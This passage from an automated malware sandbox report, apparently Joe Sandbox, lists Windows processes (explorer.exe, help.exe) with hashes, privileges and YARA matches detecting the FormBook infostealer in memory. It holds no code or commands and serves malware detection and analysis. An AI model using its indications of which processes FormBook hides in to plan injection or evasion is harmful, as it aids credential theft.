                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low
                                            Start time:12:56:11
                                            Start date:09/11/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff662bf0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high
                                            Start time:12:56:45
                                            Start date:09/11/2021
                                            Path:C:\Windows\SysWOW64\help.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\help.exe
                                            Imagebase:0x120000
                                            File size:10240 bytes
                                            MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis